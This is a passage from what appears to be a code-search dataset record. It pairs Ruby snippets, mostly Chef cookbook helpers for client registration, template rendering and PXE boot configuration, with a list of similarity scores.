"def register_tscm\n case node['platform']\n when 'redhat'\n client_id = shell_out('cat /opt/IBM/SCM/client/client.id').stdout\n\n if client_id.to_i == -1\n # registering the tscm client with server\n Chef::Log.info('Registering TSCM client........')\n\n # check for key required for server authentication\n verify_key\n\n # registering client using ssh command\n execute 'register-node' do\n command \"ssh -n -o StrictHostKeyChecking=no -i #{node['tscm']['key']} #{node['tscm']['proxy_user']}@#{node['tscm']['proxy_server']} powershell.exe -File 'C:/TSCM_Automation/TSCM_wrapper.ps1' #{node['tscm']['register_ot']} #{node['tscm']['node_name']} #{node['tscm']['OS_type']} #{node['tscm']['node_IP']}\"\n action :run\n timeout 1800\n end\n\n ruby_block 'sleep-after-register' do\n block do\n sleep(120)\n end\n action :run\n end\n \n else\n Chef::Log.error('TSCM Client: ' + (node['tscm']['node_name']).to_s + ' Already Registered with Object ID : ' + client_id.to_s + '.....................Nothing to do')\n node.default['tscm']['registration_status'] = 'success'\n end\n\n # registering on aix\n when 'aix'\n client_id = shell_out('cat /opt/IBM/SCM/client/client.id').stdout\n\n # check if the key is available; download in case it is not available\n verify_key\n \n Chef::Log.error(client_id.to_i)\n if client_id.to_i == -1\n Chef::Log.info('Registering the TSCM client.......')\n\n # registering the tscm client with server\n Chef::Log.info('Registering TSCM client........')\n\n execute 'register-tscm' do\n command \"ssh -n -o StrictHostKeyChecking=no -i #{node['tscm']['key']} #{node['tscm']['proxy_user']}@#{node['tscm']['proxy_server']} powershell.exe -File 'C:/TSCM_Automation/TSCM_wrapper.ps1' #{node['tscm']['register_ot']} #{node['tscm']['node_name']} #{node['tscm']['OS_type']} #{node['tscm']['node_IP']}\"\n action :run\n timeout 1800\n end\n\n ruby_block 'sleep-after-register' do\n block do\n sleep(120)\n end\n action :run\n end\n\n # checking log files for validating registration\n if ::File.exist?('/opt/IBM/SCM/client/client.log') && ::File.readlines('/opt/IBM/SCM/client/client.log').grep(/Storing obsfucated schedules/)\n Chef::Log.info('Registration Success...........')\n else\n Chef::Log.error('Registration Failed...........')\n end\n else\n Chef::Log.error('TSCM Client: ' + (node['tscm']['node_name']).to_s + ' Already Registered with Object ID : ' + client_id.to_s + '.....................Nothing to do')\n node.default['tscm']['registration_status'] = 'success'\n Chef::Log.error((node['tscm']['registration_status']).to_s)\n end\n end\nend",
"def render_defaults\n template '/etc/default/haproxy' do\n cookbook 'consul-haproxy'\n source 'haproxy_defaults.erb'\n mode '0644'\n action :create\n end\nend",
"def render_knife_config\n template File.join(cluster_data_dir, 'knife.rb') do\n variables lazy {\n {\n chef_server_url: chef_server_url,\n client_key: \"#{cluster_data_dir}/delivery.pem\",\n analytics_server_url: if analytics_enabled?\n \"https://#{analytics_server_fqdn}/organizations\" \\\n \"/#{node['delivery-cluster']['chef-server']['organization']}\"\n else\n ''\n end,\n supermarket_site: supermarket_enabled? ? \"https://#{supermarket_server_fqdn}\" : ''\n }\n }\n end\n end",
"def resource_class\n Chef::Resource::ChefDataBag\n end",
"def generate_solo_config\n @ssh.write \"/tmp/solo.rb\", sudo: true do |file|\n file << \"require '#{APPD_COOKBOOK_PATH}/libraries/appd-chef-formatter.rb'\"\n file << \"cookbook_path #{@cookbook_path}\"\n end\n end",
"def run_chef(use_solo=true, log_level='info', recipes=[])\n chef_bin = use_solo ? \"chef-solo\" : \"chef-client -z\"\n sudo \"bin/#{chef_bin} --log_level #{log_level} -c solo.rb -j kitchenplan-attributes.json -o #{recipes.join(\",\")}\"\n end",
"def local_cookbook(name, path=nil)\n if path\n cookbook name, path: \"#{path}/#{name}\"\n else\n cookbook name, path: \"#{ENV['CHEF_REPO']}/cookbooks/#{name}\"\n end\nend",
"def getPackageDetails(cloud_name, cookbook_name, a_comp_mirrors, a_cloud_mirrors, src_mirror, node_platform, distributionurl)\n\n #Chef::Log.info(\"Getting mirror for app: #{cookbook_name} & cloud: #{cloud_name}\")\n base_url = ''\n base_url = distributionurl if (distributionurl != nil && !distributionurl.empty?)\n\n log \"getting_couchbase_pack\" do\n message \"Getting mirror for app: #{cookbook_name}, cloud: #{cloud_name} base url: #{base_url}\"\n level :info\n end\n\n # Search for component mirror\n comp_mirrors = JSON.parse(a_comp_mirrors) if base_url.empty?\n base_url = comp_mirrors[0] if (comp_mirrors != nil && comp_mirrors.size > 0)\n # Search for cloud mirror\n cloud_mirrors = JSON.parse(a_cloud_mirrors) if base_url.empty?\n base_url = cloud_mirrors[cookbook_name] if !cloud_mirrors.nil? && cloud_mirrors.has_key?(cookbook_name)\n # Search for cookbook default attribute mirror\n base_url = src_mirror if base_url.empty?\n\n case node_platform\n # Redhat based distros\n when 'redhat', 'centos', 'fedora'\n package_type = 'rpm'\n package_installer = 'rpm -i --nodeps'\n yum_package 'perl-Time-HiRes' do\n action :install\n end\n # Debian based ditros\n when 'ubuntu', 'debian'\n package_type = 'deb'\n package_installer = 'dpkg -i'\n else\n Chef::Application.fatal!(\"#{node_platform} platform is not supported for Couchbase.\")\n end\n #Chef::Log.info(\"Mirror base_url: #{base_url} & package_type: #{package_type}\")\n log \"result_couchbase_pack\" do\n message \"Mirror base_url: #{base_url} & package_type: #{package_type}\"\n level :info\n end\n return base_url, package_type, package_installer\nend",
"def configure_ks_pxe_client(options)\n options['ip'] = single_install_ip(options)\n tftp_pxe_file = options['mac'].gsub(/:/,\"\")\n tftp_pxe_file = tftp_pxe_file.upcase\n tftp_pxe_file = \"01\"+tftp_pxe_file+\".pxelinux\"\n test_file = options['tftpdir']+\"/\"+tftp_pxe_file\n tmp_file = \"/tmp/pxecfg\"\n if File.symlink?(test_file)\n message = \"Information:\\tRemoving old PXE boot file \"+test_file\n command = \"rm #{test_file}\"\n execute_command(options,message,command)\n end\n pxelinux_file = \"pxelinux.0\"\n message = \"Information:\\tCreating PXE boot file for \"+options['name']+\" with MAC address \"+options['mac']\n command = \"cd #{options['tftpdir']} ; ln -s #{pxelinux_file} #{tftp_pxe_file}\"\n execute_command(options,message,command)\n if options['service'].to_s.match(/live/)\n iso_dir = options['tftpdir']+\"/\"+options['service']\n message = \"Information:\\tDetermining install ISO location\"\n command = \"ls #{iso_dir}/*.iso\"\n iso_file = execute_command(options,message,command) \n iso_file = iso_file.chomp\n install_iso = File.basename(iso_file)\n end\n if options['biostype'].to_s.match(/efi/)\n shim_efi_file = \"/usr/lib/shim/shimx64.efi\"\n if !File.exist?(shim_efi_file)\n install_package(options,\"shim\")\n end\n shim_grub_file = options['tftpdir']+\"/shimx64.efi\"\n net_efi_file = \"/usr/lib/grub/x86_64-efi/monolithic/grubnetx64.efi\"\n if !File.exist?(net_efi_file)\n install_package(options,\"grub-efi-amd64-bin\")\n end\n net_grub_file = options['tftpdir']+\"/grubx64.efi\"\n check_dir_exists(options,options['tftpdir'])\n check_dir_owner(options,options['tftpdir'],options['uid'])\n if !File.exist?(shim_efi_file)\n install_package(options,\"shim-signed\")\n end\n if !File.exist?(net_efi_file)\n install_package(options,\"grub-efi-amd64-signed\")\n end\n if !File.exist?(shim_grub_file)\n message = \"Information:\\tCopying #{shim_efi_file} to #{shim_grub_file}\"\n command = \"cp #{shim_efi_file} #{shim_grub_file}\"\n execute_command(options,message,command)\n check_file_owner(options,shim_grub_file,options['uid'])\n end\n if !File.exist?(net_grub_file)\n message = \"Information:\\tCopying #{net_efi_file} to #{net_grub_file}\"\n command = \"cp #{net_efi_file} #{net_grub_file}\"\n execute_command(options,message,command)\n check_file_owner(options,net_grub_file,options['uid'])\n end\n tmp_cfg_octs = options['ip'].split(\".\")\n pxe_cfg_octs = [] \n tmp_cfg_octs.each do |octet|\n hextet = octet.convert_base(10, 16)\n if hextet.length < 2\n hextet = \"0\"+hextet\n end\n pxe_cfg_octs.push(hextet.upcase) \n end\n pxe_cfg_txt = pxe_cfg_octs.join\n pxe_cfg_file = \"grub.cfg-\"+pxe_cfg_txt\n pxe_cfg_dir = options['tftpdir']+\"/grub\"\n check_dir_exists(options,pxe_cfg_dir)\n check_dir_owner(options,pxe_cfg_dir,options['uid'])\n pxe_cfg_file = pxe_cfg_dir+\"/\"+pxe_cfg_file\n else\n pxe_cfg_dir = options['tftpdir']+\"/pxelinux.cfg\"\n pxe_cfg_file = options['mac'].gsub(/:/,\"-\")\n pxe_cfg_file = \"01-\"+pxe_cfg_file\n pxe_cfg_file = pxe_cfg_file.downcase\n pxe_cfg_file = pxe_cfg_dir+\"/\"+pxe_cfg_file\n end\n if options['service'].to_s.match(/sles/)\n vmlinuz_file = \"/\"+options['service']+\"/boot/#{options['arch']}/loader/linux\"\n else\n if options['service'].to_s.match(/live/)\n vmlinuz_file = \"/\"+options['service']+\"/casper/vmlinuz\"\n else\n vmlinuz_file = \"/\"+options['service']+\"/images/pxeboot/vmlinuz\"\n end\n end\n if options['service'].to_s.match(/ubuntu/)\n if options['service'].to_s.match(/live/)\n initrd_file = \"/\"+options['service']+\"/casper/initrd\"\n 
else\n if options['service'].to_s.match(/x86_64/)\n initrd_file = \"/\"+options['service']+\"/images/pxeboot/netboot/ubuntu-installer/amd64/initrd.gz\"\n linux_file = \"/\"+options['service']+\"/images/pxeboot/netboot/ubuntu-installer/amd64/linux\"\n else\n initrd_file = \"/\"+options['service']+\"/images/pxeboot/netboot/ubuntu-installer/i386/initrd.gz\"\n end\n end\n ldlinux_link = options['tftpdir']+\"/ldlinux.c32\"\n if not File.exist?(ldlinux_link) and not File.symlink?(ldlinux_link)\n ldlinux_file = options['service']+\"/images/pxeboot/netboot/ldlinux.c32\"\n message = \"Information:\\tCreating symlink for ldlinux.c32\"\n command = \"ln -s #{ldlinux_file} #{ldlinux_link}\"\n execute_command(options,message,command)\n end\n else\n if options['service'].to_s.match(/sles/)\n initrd_file = \"/\"+options['service']+\"/boot/#{options['arch']}/loader/initrd\"\n else\n initrd_file = \"/\"+options['service']+\"/images/pxeboot/initrd.img\"\n end\n end\n if options['host-os-name'].to_s.match(/Darwin/)\n vmlinuz_file = vmlinuz_file.gsub(/^\\//,\"\")\n initrd_file = initrd_file.gsub(/^\\//,\"\")\n end\n if options['service'].to_s.match(/packer/)\n host_info = options['vmgateway']+\":\"+options['httpport']\n else\n host_info = options['hostip']\n end\n #ks_url = \"http://\"+host_info+\"/clients/\"+options['service']+\"/\"+options['name']+\"/\"+options['name']+\".cfg\"\n #autoyast_url = \"http://\"+host_info+\"/clients/\"+options['service']+\"/\"+options['name']+\"/\"+options['name']+\".xml\"\n base_url = \"http://\"+options['hostip']+\"/\"+options['name']\n if options['service'].to_s.match(/live/)\n iso_url = \"http://\"+options['hostip']+\"/\"+options['service']+\"/\"+install_iso\n end\n ks_url = \"http://\"+options['hostip']+\"/\"+options['name']+\"/\"+options['name']+\".cfg\"\n autoyast_url = \"http://\"+options['hostip']+\"/\"+options['name']+\"/\"+options['name']+\".xml\"\n install_url = \"http://\"+host_info+\"/\"+options['service']\n file = File.open(tmp_file,\"w\")\n if options['biostype'].to_s.match(/efi/)\n menuentry = \"menuentry \\\"\"+options['name']+\"\\\" {\\n\"\n file.write(menuentry)\n else\n if options['serial'] == true\n file.write(\"serial 0 115200\\n\")\n file.write(\"prompt 0\\n\")\n end\n file.write(\"DEFAULT LINUX\\n\")\n file.write(\"LABEL LINUX\\n\")\n file.write(\" KERNEL #{vmlinuz_file}\\n\")\n if options['service'].to_s.match(/live/)\n file.write(\" INITRD #{initrd_file}\\n\")\n end\n end\n if options['service'].to_s.match(/ubuntu/)\n options['ip'] = options['q_struct']['ip'].value\n install_domain = options['q_struct']['domain'].value\n install_nic = options['q_struct']['nic'].value\n options['vmgateway'] = options['q_struct']['gateway'].value\n options['netmask'] = options['q_struct']['netmask'].value\n options['vmnetwork'] = options['q_struct']['network_address'].value\n disable_dhcp = options['q_struct']['disable_dhcp'].value\n if disable_dhcp.match(/true/)\n if options['biostype'].to_s.match(/efi/)\n if options['service'].to_s.match(/live/)\n linux_file = \"/\"+options['service'].to_s+\"/casper/vmlinuz\"\n initrd_file = \"/\"+options['service'].to_s+\"/casper/initrd\"\n if options['biosdevnames'] == true\n append_string = \" linux #{linux_file} net.ifnames=0 biosdevname=0 root=/dev/ram0 ramdisk_size=1500000 ip=dhcp url=#{iso_url} autoinstall ds=nocloud-net;s=#{base_url}/\"\n else\n append_string = \" linux #{linux_file} root=/dev/ram0 ramdisk_size=1500000 ip=dhcp url=#{iso_url} autoinstall ds=nocloud-net;s=#{base_url}/\"\n end\n initrd_string = \" initrd 
#{initrd_file}\"\n else\n if options['biosdevnames'] == true\n append_string = \" linux #{linux_file} --- auto=true priority=critical preseed/url=#{ks_url} console-keymaps-at/keymap=us locale=en_US hostname=#{options['name']} domain=#{install_domain} interface=#{install_nic} grub-installer/bootdev=#{options['rootdisk']} netcfg/get_ipaddress=#{options['ip']} netcfg/get_netmask=#{options['netmask']} netcfg/get_gateway=#{options['vmgateway']} netcfg/get_nameservers=#{options['nameserver']} netcfg/disable_dhcp=true initrd=#{initrd_file} net.ifnames=0 biosdevname=0\"\n else\n append_string = \" linux #{linux_file} --- auto=true priority=critical preseed/url=#{ks_url} console-keymaps-at/keymap=us locale=en_US hostname=#{options['name']} domain=#{install_domain} interface=#{install_nic} grub-installer/bootdev=#{options['rootdisk']} netcfg/get_ipaddress=#{options['ip']} netcfg/get_netmask=#{options['netmask']} netcfg/get_gateway=#{options['vmgateway']} netcfg/get_nameservers=#{options['nameserver']} netcfg/disable_dhcp=true initrd=#{initrd_file}\"\n end\n initrd_string = \" initrd #{initrd_file}\"\n end\n else\n if options['service'].to_s.match(/live/)\n if options['biosdevnames'] == true\n append_string = \" APPEND root=/dev/ram0 ramdisk_size=1500000 ip=dhcp url=#{iso_url} autoinstall ds=nocloud-net;s=#{base_url}/ net.ifnames=0 biosdevname=0\"\n else\n append_string = \" APPEND root=/dev/ram0 ramdisk_size=1500000 ip=dhcp url=#{iso_url} autoinstall ds=nocloud-net;s=#{base_url}/\"\n end\n else\n if options['biosdevnames'] == true\n append_string = \" APPEND auto=true priority=critical preseed/url=#{ks_url} console-keymaps-at/keymap=us locale=en_US hostname=#{options['name']} domain=#{install_domain} interface=#{install_nic} grub-installer/bootdev=#{options['rootdisk']} netcfg/get_ipaddress=#{options['ip']} netcfg/get_netmask=#{options['netmask']} netcfg/get_gateway=#{options['vmgateway']} netcfg/get_nameservers=#{options['nameserver']} netcfg/disable_dhcp=true initrd=#{initrd_file} net.ifnames=0 biosdevname=0\"\n else\n append_string = \" APPEND auto=true priority=critical preseed/url=#{ks_url} console-keymaps-at/keymap=us locale=en_US hostname=#{options['name']} domain=#{install_domain} interface=#{install_nic} grub-installer/bootdev=#{options['rootdisk']} netcfg/get_ipaddress=#{options['ip']} netcfg/get_netmask=#{options['netmask']} netcfg/get_gateway=#{options['vmgateway']} netcfg/get_nameservers=#{options['nameserver']} netcfg/disable_dhcp=true initrd=#{initrd_file}\"\n end\n end\n end\n else\n append_string = \" APPEND \"\n end\n else\n if options['service'].to_s.match(/sles/)\n if options['biosdevnames'] == true\n append_string = \" APPEND initrd=#{initrd_file} install=#{install_url} autoyast=#{autoyast_url} language=#{options['language']} net.ifnames=0 biosdevname=0\"\n else\n append_string = \" APPEND initrd=#{initrd_file} install=#{install_url} autoyast=#{autoyast_url} language=#{options['language']}\"\n end\n else\n if options['service'].to_s.match(/fedora_2[0-3]/)\n if options['biosdevnames'] == true\n append_string = \" APPEND initrd=#{initrd_file} ks=#{ks_url} ip=#{options['ip']} netmask=#{options['netmask']} net.ifnames=0 biosdevname=0\"\n else\n append_string = \" APPEND initrd=#{initrd_file} ks=#{ks_url} ip=#{options['ip']} netmask=#{options['netmask']}\"\n end\n else\n if options['service'].to_s.match(/live/)\n if options['biosdevnames'] == true\n append_string = \" APPEND net.ifnames=0 biosdevname=0 root=/dev/ram0 ramdisk_size=1500000 ip=dhcp url=#{iso_url}\"\n else\n 
append_string = \" APPEND root=/dev/ram0 ramdisk_size=1500000 ip=dhcp url=#{iso_url}\"\n end\n else \n if options['biosdevnames'] == true\n append_string = \" APPEND initrd=#{initrd_file} ks=#{ks_url} ksdevice=bootif ip=#{options['ip']} netmask=#{options['netmask']} net.ifnames=0 biosdevname=0\"\n else\n append_string = \" APPEND initrd=#{initrd_file} ks=#{ks_url} ksdevice=bootif ip=#{options['ip']} netmask=#{options['netmask']}\"\n end\n end\n end\n end\n end\n if options['text'] == true\n if options['service'].to_s.match(/sles/)\n append_string = append_string+\" textmode=1\"\n else\n append_string = append_string+\" text\"\n end\n end\n if options['serial'] == true\n append_string = append_string+\" serial console=ttyS0\"\n end\n append_string = append_string+\"\\n\"\n file.write(append_string)\n if options['biostype'].to_s.match(/efi/)\n initrd_string = initrd_string+\"\\n\"\n file.write(initrd_string)\n file.write(\"}\\n\")\n end\n file.flush\n file.close\n if options['biostype'].to_s.match(/efi/)\n grub_file = pxe_cfg_dir+\"/grub.cfg\"\n if File.exist?(grub_file)\n File.delete(grub_file)\n end\n FileUtils.touch(grub_file)\n grub_file = File.open(grub_file, \"w\")\n file_list = Dir.entries(pxe_cfg_dir)\n file_list.each do |file_name|\n if file_name.match(/cfg\\-/) and !file_name.match(/#{options['name'].to_s}/)\n temp_file = pxe_cfg_dir+\"/\"+file_name\n temp_array = File.readlines(temp_file)\n temp_array.each do |temp_line|\n grub_file.write(temp_line)\n end\n end\n end\n menuentry = \"menuentry \\\"\"+options['name']+\"\\\" {\\n\"\n grub_file.write(menuentry)\n grub_file.write(append_string)\n grub_file.write(initrd_string)\n grub_file.write(\"}\\n\")\n grub_file.flush\n grub_file.close\n grub_file = pxe_cfg_dir+\"/grub.cfg\"\n FileUtils.touch(grub_file)\n print_contents_of_file(options,\"\",grub_file)\n end\n message = \"Information:\\tCreating PXE configuration file \"+pxe_cfg_file\n command = \"cp #{tmp_file} #{pxe_cfg_file} ; rm #{tmp_file}\"\n execute_command(options,message,command)\n print_contents_of_file(options,\"\",pxe_cfg_file)\n return\nend",
"def chef_client\n return @chef_client unless @chef_client.nil?\n @chef_client = cluster.find_client(fullname) || false\n end",
"def chef_name\n \"#{name}_#{id}\"\n end",
"def mysql_stack\n recipe :apache_server\n recipe :passenger_gem, :passenger_configure_gem_path, :passenger_apache_module, :passenger_site\n recipe :mysql_server, :mysql_gem, :mysql_fixup_debian_start\n #recipe :mysql_database, :mysql_user # TODO: parses database.yml\n recipe :rails_rake_environment, :rails_gems, :rails_directories, :rails_bootstrap\n recipe :ntp, :time_zone, :postfix, :cron_packages, :motd, :security_updates\n end",
"def default_chef_run(&block)\n ChefSpec::ServerRunner.new do |node|\n ## allow the runner to be configured like it would normally by calling any\n ## passed in block.\n yield node unless block.nil?\n end.converge described_recipe\nend",
"def init\n clone_appd_cookbook\n chef_gem \"install berkshelf\"\n end"
] | [
"0.6365945",
"0.6294414",
"0.6217326",
"0.6217326",
"0.6217326",
"0.62059665",
"0.6134021",
"0.5994452",
"0.598766",
"0.5887639",
"0.5840201",
"0.58226264",
"0.5754595",
"0.5734258",
"0.57215744",
"0.571388",
"0.5710585",
"0.5701464",
"0.5689198",
"0.56596404",
"0.5651977",
"0.56478864",
"0.56006855",
"0.5575673",
"0.55738753",
"0.55738753",
"0.55738753",
"0.55738753",
"0.55738753",
"0.55738753",
"0.55694294",
"0.5552146",
"0.5550597",
"0.5550597",
"0.55445474",
"0.552212",
"0.55196655",
"0.5515998",
"0.55068976",
"0.55009997",
"0.5497126",
"0.549685",
"0.549685",
"0.549685",
"0.549685",
"0.5491627",
"0.5491505",
"0.5486526",
"0.5486526",
"0.5486526",
"0.5486526",
"0.5486526",
"0.5486526",
"0.5486526",
"0.5481323",
"0.5464451",
"0.54517853",
"0.54517853",
"0.5451419",
"0.54451007",
"0.5434836",
"0.5433184",
"0.54282707",
"0.54251474",
"0.5423148",
"0.54230106",
"0.54205084",
"0.54199696",
"0.53964174",
"0.5380254",
"0.5372802",
"0.5368101",
"0.53647816",
"0.53644013",
"0.53644013",
"0.53644013",
"0.53644013",
"0.5361758",
"0.53504497",
"0.5341039",
"0.53394246",
"0.5335116",
"0.53281474",
"0.53225464",
"0.53016245",
"0.5295022",
"0.5294768",
"0.529415",
"0.5289663",
"0.52881396",
"0.52814263",
"0.5274009",
"0.52726436",
"0.52700543",
"0.5267279",
"0.5262939",
"0.5257626",
"0.52575403",
"0.52487135",
"0.52399766",
"0.52357596"
] | 0.0 | -1 |
G => E
     |
     v
F => B => A
C => D | def topo_sort(dependencies) # tarjan's algorithm
dependencies.default = [] # no need for #default_proc because array never gets mutated
seen = {}
ordering = []
dependencies.keys.each do |vertex|
resolve!(vertex, dependencies, ordering, seen) unless seen[vertex]
end
ordering
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def gamma_decomposition\r\n k = 0; comparability=true; classification={}\r\n edges.map {|edge| [edge.source,edge.target]}.each do |e|\r\n if classification[e].nil?\r\n k += 1\r\n classification[e] = k; classification[e.reverse] = -k\r\n comparability &&= gratr_comparability_explore(e, k, classification)\r\n end\r\n end; [classification, comparability]\r\n end",
"def _V(data) ; end",
"def mes(v,g)\n l_succ = Set.new\n g.adjacent_vertices(v).each { |sv| l_succ << @l[sv] }\n i = 0\n i += 1 until l_succ.member?(i) == false\n @l[v] = i \n end",
"def gamma_decomposition\n k = 0; comparability=true; classification={}\n edges.map {|edge| [edge.source,edge.target]}.each do |e|\n if classification[e].nil?\n k += 1\n classification[e] = k; classification[e.reverse] = -k\n comparability &&= plexus_comparability_explore(e, k, classification)\n end\n end; [classification, comparability]\n end",
"def adj(v)\n Pazy::Enumerable::Generator.new do |yielder|\n succ(v).each &yielder.method(:yield)\n pred(v).each &yielder.method(:yield)\n end\n end",
"def do_v(s); s[:direction] = 'down'; end",
"def bothV\n [outV, inV]\n end",
"def each_edge(v)\n raise NotImplementedError\n end",
"def inversed=(_arg0); end",
"def edges_from(v)\n @from_store[v]\n end",
"def apobec3gf(seq = \"\")\n seq.tr!(\"-\", \"\")\n seq_length = seq.size\n apobec_position = []\n control_position = []\n (0..(seq_length - 3)).each do |n|\n tri_base = seq[n,3]\n if tri_base =~ /G[A|G][A|G|T]/\n apobec_position << n\n elsif seq[n] == \"G\"\n control_position << n\n end\n end\n return [apobec_position,control_position]\nend",
"def dclrG\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 9 )\n a = nil\n b = nil\n\n begin\n # at line 47:11: b= type a= ID ( '=' comp )?\n @state.following.push( TOKENS_FOLLOWING_type_IN_dclrG_392 )\n b = type\n @state.following.pop\n a = match( ID, TOKENS_FOLLOWING_ID_IN_dclrG_396 )\n # --> action\n agc_1(a,b,true,false,false,true)\n # <-- action\n # at line 47:58: ( '=' comp )?\n alt_11 = 2\n look_11_0 = @input.peek( 1 )\n\n if ( look_11_0 == EQLS )\n alt_11 = 1\n end\n case alt_11\n when 1\n # at line 47:59: '=' comp\n match( EQLS, TOKENS_FOLLOWING_EQLS_IN_dclrG_401 )\n # --> action\n agc_2('=')\n # <-- action\n @state.following.push( TOKENS_FOLLOWING_comp_IN_dclrG_406 )\n comp\n @state.following.pop\n # --> action\n agc_3('=')\n # <-- action\n\n end\n\n rescue ANTLR3::Error::RecognitionError => re\n report_error(re)\n recover(re)\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 9 )\n\n end\n \n return \n end",
"def common_face(edge2)\n end",
"def common_face(edge2)\n end",
"def g; end",
"def g; end",
"def V(*args)\n end",
"def f\n g\n end",
"def compose(g)\n\t\t\t\tlambda do |*a,&b|\n\t\t\t\t\tself.call(*g.call(*a,&b))\n\t\t\t\tend\n\t\t\tend",
"def fold f,g\n case self\n when Left then f.(get)\n when Right then g.(get)\n end\n end",
"def apobec3gf(seq = '')\n #seq.tr!(\"-\", \"\")\n seq_length = seq.size\n apobec_position = []\n control_position = []\n (0..(seq_length - 3)).each do |n|\n tri_base = seq[n,3]\n if tri_base =~ /G[A|G][A|G|T]/\n apobec_position << n\n elsif seq[n] == \"G\"\n control_position << n\n end\n end\n\n return [apobec_position,control_position]\n end",
"def |(enum); end",
"def satisfiedG(g, gi, gv)\n not nullG(g, gi, gv) and\n not terminalG(g, gi, gv) and\n pg(g, gi, gv) and\n s(g, gi, gv) and\n not f(g, gi, gv)\nend",
"def is_car(c)\n case c\n when 'v'\n [true, :down]\n when '^'\n [true, :up]\n when '>'\n [true, :right]\n when '<'\n [true, :left]\n else\n [false, nil]\n end\nend",
"def tr(p0, p1) end",
"def pa\n return VasmGrammar.new, VasmTransform.new\nend",
"def edges_to(v)\n @to_store[v]\n end",
"def x_vertex(p_hn, p_v)\n case p_v\n when :n, :s then return xp_from_hn(p_hn) + rhl\n when :ne, :se then return xp_from_hn(p_hn) + fw \n else return xp_from_hn(p_hn) \n end \n end",
"def f6; return *['a','b'] &['a','Y','Z'] end",
"def |(p0) end",
"def |(p0) end",
"def |(p0) end",
"def |(p0) end",
"def |(p0) end",
"def |(p0) end",
"def greibach_normal_form\n raise NotImplementedError\n end",
"def upc_e_with_composite_symbology; end",
"def g_(acc,elt)\n elt/acc\nend",
"def each_edge(v)\n raise ArgumentError, \"No such vertex\" if v < 0 or @vertices <= v\n @adjacent[v].each { |w| yield v,w }\n end",
"def transitions\n [\n {:parked => :idling, :on => :ignite},\n {:idling => :first_gear, :first_gear => :second_gear, :on => :shift_up}\n # ...\n ]\n end",
"def accept(visitor); end",
"def accept(visitor); end",
"def test_add_edge_aliases\n Automaton.new(false) do |fa|\n s0 = fa.add_state(:initial => true)\n s1 = fa.create_state\n assert_not_nil fa.add_edge(s0,s1, 'a')\n assert_not_nil fa.create_edge(s0,s1,'b')\n assert_not_nil fa.connect(s0,s1,'c')\n end\n end",
"def compose(f, g)\r\n\treturn lambda {|z| f.call(g.call(z))}\r\nend",
"def upc_a_with_composite_symbology; end",
"def inversed; end",
"def alternatives; end",
"def terminalG(g, gi, gv)\n @state[GOAL].any? {|terms| terms.size == 3 and terms[0] == g and terms[1] == gi} and (state(DROPPED, g, gi, gv) or state(ABORTED, g, gi, gv))\nend",
"def union! newFA\ns0 = new_state\ns1 = new_state\nadd_transition(s0, @start, \"\")\nadd_transition(s0, newFA.get_start, \"\")\n# reset the final states of the current object\nkeys = @final.keys\ni = 0\nwhile i < keys.size\nadd_transition(keys[i], s1, \"\")\nset_final(keys[i], false)\ni = i + 1\nend\n# set the final states of the other object\nkeys = newFA.get_final\ni = 0\nwhile i < keys.size\nadd_transition(keys[i], s1, \"\")\ni = i + 1\nend\n# copy over the states\nkeys = newFA.get_state\ni = 0\nwhile i < keys.size\nadd_state(keys[i])\ni = i + 1\nend\n# copy over the transitions\nnewFA.get_trans_hash.keys.sort.each { |v1|\nnewFA.get_trans_hash[v1].keys.sort.each { |x|\nv2 = newFA.get_transition(v1,x)\ni = 0\nwhile i < v2.size\nadd_transition(v1, v2[i], x)\ni = i + 1\nend\n}\n}\nset_start(s0)\nset_final(s1, true)\n# copy over the alphabets\nnewFA.get_alpha.each{|a|\nif @alphabet.include?(a) == false\n@alphabet.push(a)\nend\n}\nend",
"def solve(a, b, driver:\"gen\", uplo:'U')\n case driver.to_s\n when /^gen?(sv)?$/i\n # returns lu, x, ipiv, info\n Lapack.call(:gesv, a, b)[1]\n when /^(sym?|her?|pos?)(sv)?$/i\n func = driver[0..1].downcase+\"sv\"\n Lapack.call(func, a, b, uplo:uplo)[1]\n else\n raise ArgumentError, \"invalid driver: #{driver}\"\n end\n end",
"def vd(s, a, d)\n r = v(s, a)\n # NOTE: If the potential return is not of the same type,\n # we should return something appropriate (ie, the default)\n # FIXME: Throw error on class inequality?\n if r.nil || r.class != d.class\n return d\n else\n return r\n end\nend",
"def test_a_vertical_pipe_means_or\n grays = /(James|Dana|Summer) Gray/\n assert_equal 'James Gray', \"James Gray\"[grays]\n assert_equal 'Summer', \"Summer Gray\"[grays, 1]\n assert_equal nil, \"Jim Gray\"[grays, 1]\n end",
"def edge?(u,v)\n return @source[u].has_key?(v)\n end",
"def f\n self.g + self.h\n end",
"def each_vertex(&b)\n @forward_edges_with_info.each_key(&b)\n end",
"def step!(next_state)\n @state = case @state\n when :a\n next_state == :b ? :b : :a\n when :b\n [:a, :c].include?(next_state) ? next_state : :b\n when :c\n :d\n else\n :a\n end\n end",
"def lh(t, s, c)\n\n end",
"def traverse_df(aStartVertex, &_visitAction)\n visited = Set.new\n stack = []\n visitee = aStartVertex\n curr_edge = nil\n\n begin\n # print_vertex( 'Traversing', visitee)\n\n first_time = !visited.include?(visitee)\n if first_time\n yield(visitee)\n visited << visitee\n end\n\n case visitee\n when Rley::GFG::StartVertex\n if first_time\n stack.push(Branching.new(visitee, curr_edge))\n curr_edge = stack.last.next_edge\n elsif curr_edge.nil?\n # Error probably caused by missing terminal symbol object\n msg = \"Undefined grammar symbol #{visitee.label.sub(/^\\./, '')}\"\n raise StandardError, msg\n else\n # Skip both start and end vertices\n # Retrieve the corresponding return edge\n curr_edge = get_matching_return(curr_edge)\n end\n\n when Rley::GFG::EndVertex\n if stack.last.done?\n popped = stack.pop\n break if stack.empty?\n\n # puts \"Popped!\"\n return_key = popped.in_edge.key.sub(/^CALL/, 'RET')\n curr_edge = visitee.edges.find { |e| e.key == return_key }\n else\n curr_edge = stack.last.next_edge\n end\n\n else\n # All other vertex types have only one successor\n curr_edge = visitee.edges[0]\n end\n visitee = curr_edge.successor unless curr_edge.nil?\n end until stack.empty?\n # Now process the end vertex matching the initial start vertex\n last_one = end_vertex_for[aStartVertex.non_terminal]\n yield(last_one) unless visited.include?(last_one)\n end",
"def from_left; end",
"def from_left; end",
